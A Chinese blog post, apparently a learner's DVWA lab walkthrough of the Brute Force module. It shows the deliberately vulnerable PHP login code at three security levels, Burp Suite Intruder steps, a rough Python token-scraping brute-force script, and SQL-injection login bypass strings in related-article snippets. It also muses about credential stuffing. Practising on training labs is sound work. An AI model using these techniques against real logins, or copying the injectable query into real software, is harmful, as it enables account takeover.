dvwa-brute force

最新推荐文章于 2024-07-15 12:05:52 发布
最新推荐文章于 2024-07-15 12:05:52 发布
阅读量474 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Alter__/article/details/72053084
版权

菜鸟一枚,略显详细。

Brute force

是指黑客利用密码字典,使用穷举法猜解出用户口令。

low

<?php
if( isset( $_GET[ 'Login' ] ) ) {
   $user = $_GET[ 'username' ];
   $pass = $_GET[ 'password' ];
   $pass = md5( $pass );

   $query  = "SELECT * FROM  `users`  WHERE user = '$user'  AND password = '$pass';";
   $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"]))
 ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) 
? $___mysqli_res : false)) . '</pre>' );

   if( $result && mysqli_num_rows( $result ) == 1 ) {
      // mysqli_num_rows 记数
      $row    = mysqli_fetch_assoc( $result );
     //mysql_fetch_assoc() 函数从结果集中取得一行作为关联数组。返回根据从结果集取得的行生成的关联数组
     $avatar = $row["avatar"];

      // Login successful
      $html .= "<p>Welcome to the password protected area {$user}</p>";
      $html .= "<img src=\"{$avatar}\" />";
   }
   else {
      // Login failed
      $html .= "<pre><br />Username and/or password incorrect.</pre>";
   }

   ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

爆破-butpsuite

第一步抓包

第二步,ctrl+I将包复制到intruder模块,因为要对password参数进行爆破,所以在password参数的内容两边加$

第三步选中Payloads,载入字典,点击Start attack进行爆破


输入不同的试试(成功)

sql注入

这里面有sql注入,我的理解就是对你输入的部分直接进行了查询,并没有排除它其实是一个未完成的(例如 (‘))

然而我没有成功,等我学完sql注入攻击再来一次。

5.25 学习了一点sql语言后,看了点sql注入后,了解到:单引号字符(‘)解析成代码与数据间的分界线:引号内是数据,引号外是代码。

注入成功




medium

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"]))
 ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user )
//这个函数会对字符串中的特殊符号(x00,n,r,,’,”,x1a)进行转义,基本上能够抵御sql注入攻击
 : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) 
? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass )
 : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) 
? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( 2 );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
//mysqli_close如果成功则返回 true,失败则返回 false。__mysqli_res永远非空
 }

结果和low一样,只是不能注入



height


<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
//抵御csrf
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );//去除字符串中的反斜线字符,如果有两个连续的反斜线,则只去掉一个
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?> 



from bs4 import BeautifulSoup //解析文档为用户提供需要抓取的数据
import urllib2
header={        'Host': 'xxxx'
		'If-None-Match': "xxx",
		'If-Modified-Since': 'xxx',//判断是否改变
		'User-Agent': 'xxx',
		'Accept': 'xxx',
		'Referer': 'xxx',
		'Accept-Encoding': 'xxx',
		'Accept-Language': 'xxx',
		'Cookie': 'xxx'}
requrl = "xxx"

def get_token(requrl,header):
	req = urllib2.Request(url=requrl,headers=header)
	response = urllib2.urlopen(req)
	print response.getcode(),
	the_page = response.read()
	print len(the_page)
	soup = BeautifulSoup(the_page,"html.parser")
	user_token = soup.form.input.input.input.input["value"] #get the user_token
	return user_token

user_token = get_token(requrl,header)
i=0
for line in open("rkolin.txt"):
	requrl = "xxx"+"?username=admin&password="+line.strip()/*文本里面的密码*/+"&Login=Login&user_token="+user_token
	i = i+1
	print i,'admin',line.strip(),
	user_token = get_token(requrl,header)
	if (i == 10):		break
//xxx表示抓包里面获得的


还没上手这个,日后更。

5.25,之前一直不知道为什么要用爆破,不是要自己猜么,好麻烦的,今天突然想起来,可以用来撞库么?!!!
Alter__
关注
专栏目录
DVWABrute Force
曹大喯儿的博客
03-11 487
Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令。 Low 级 爆破利用 burpsuite 即可完成 首先将自己的浏览器代理设置成手动配置代理 选项–高级–网络–连接–设置 登录dvwa网址并设置安全级别为Low 打开Burp Suite,点击拦截禁止 点击暴力破解,随便输入账号密码,点击登陆 回到Burp Suite,点击行动–发送给Intruder 点击测试器(Intruder)–位置,选择集束炸弹,并清除其它的爆破项,选择用户名和密码两个字段进行爆破。
DVWA Brute Force
部分学习记录
09-20 145
low 手动试了一下admin加password,结果直接出来了,好吧,既然是暴力破解,还是过一下,这里利用pydictor生成一个密码字典(关于pydictor的使用https://github.com/LandGrey/pydictor/blob/master/docs/doc/usage.md),然后burp抓包,在intruder中对密码进行暴力破解 看了下其他的,好像还可以进行SQL手工注入admin ’ # medium 使用burp抓包暴破,虽然时间上慢了一点,但是也能成功 high b
DVWABrute Force
谢公子的博客
08-04 1449
DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请...
DVWA靶场练习(一)——Brute Force
最新发布
liuzibo1024的博客
07-15 343
暴力破解其实就是利用不同的账户和密码进行多次尝试。因为用户在设置密码时可能会选用比较容易记忆的口令,因此,可以使用一些保存常用密码的字典或者结合用户的个人信息进行爆破。DVWA安全等级有Low,Medium,High和Impossible四种,随着安全等级的提高,网站的防护等级和攻击难度也不断提高。首先将DVWA安全等级设置为了Low。
DVWA-Brute Force
知足且坚定,温柔且上进
01-24 304
笔者随手一试,admin,password竟然正确了,惊!果然是low等级的啊,不过还是要完整做一遍的。 随便输入username与password用burpsuite抓包。 进行爆破: 注意我们要爆破username和password,所以attack type 我们要选择cluser bomb,并且只能在需要爆破的地方加上Add哦 Payload set 1和2 在Option中选择相关...
DVWA-Brute Force @ Burpsuite.docx
06-27
DVWA-Brute Force @ Burpsuite.docx
DVWA-Brute Force爆破
原味瓜子、的博客
09-16 184
目录一、Low等级二、Medium等级三、High等级 一、Low等级 1、漏洞分析 if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELE
dvwa学习-brute force(暴力破解)
qq_17762247的博客
05-09 1841
一、简介: Brute-Force(暴力破解),又称为穷举攻击,是一种密码分析的方法,即将密码进行逐个推算直到找出真正的密码为止。例如:一个已知是四位数并且全部由阿拉伯数字组成的密码,其可能共有10000种组合,因此最多尝试9999次就能找到正确的密码。理论上除了具有完善保密性的密码以外,利用这种方法可以破解任何一种密码,问题只在于如何缩短试误时间。有些人运用计算机来增加效率,有些人透过字典攻击来...
DVWA - Brute Force (high)
qq_42630215的博客
06-04 433
high级别 (使用burp suite进行暴力破解) 将登录请求进行拦截,发现增加了user_token参数,使用了随机token机制来防止CSRF,防止了重放攻击,增加了爆破难度。但是依然可以使用burpsuite来爆破。 1.先将请求发送到intruder。 2. 设置两个参数 password和user_token为变量,攻击类型选择pitchfork,它可以使用多组Payload集合,在每一个不同的Payload标志位置上(最多20个),遍历所有的Payload。举例来说,如果有两个Payloa
DVWA_bruteForce工具_官网下载_Bruter_1.1.zip
09-18
DVWABruteForce板块所需要用到的暴力破解工具。 日常暴力破解小能手。谁用谁知道。
DVWA: Brute Force
qq_43299137的博客
04-30 174
Low security: 首先随便输入一个用户名和密码: 在username中输入:admin' or '1'='1 点击登陆后: 显示登陆成功了。 简单分析一下其中原理:这种方法就是sql注入,利用mysql的查询语句,达到不用密码就可以直接登陆的目的。 看一下其中源码 SELECT * FROM `users` WHERE user = '$user' AND password = '$pass' 当我们输入:admin' or '1'='1时就相当于把代码改成: .
dvwaBrute Force
Alsn86的博客
01-13 328
low等级 <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FROM `users` WHERE user = '$user' AND passw
dvwabrute force
qq_39926171的博客
04-30 340
前提:所有爆破都建立在弱口令基础上。 Low: 知道user则可以进行注入。用一下万能密码or 1=1,成功 Medium: 尝试十六进制绕过注入无效,用burpsuite进行爆破即可,失败一次就要等2秒。但不影响爆破 High: 开burpsuite抓包: 知道账号则需要爆破token以及password,爆破模式选择为一对一,也就是pitchfork: password:paylo...
dvwa通关brute force
06-08
DVWA中,Brute Force挑战是关于用户登录部分的一个环节,主要是测试用户的密码暴力破解能力。 当你遇到Brute Force关卡时,目标是尝试使用各种可能的用户名和密码组合,直到找到正确的登录凭证。这通常涉及到编写...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值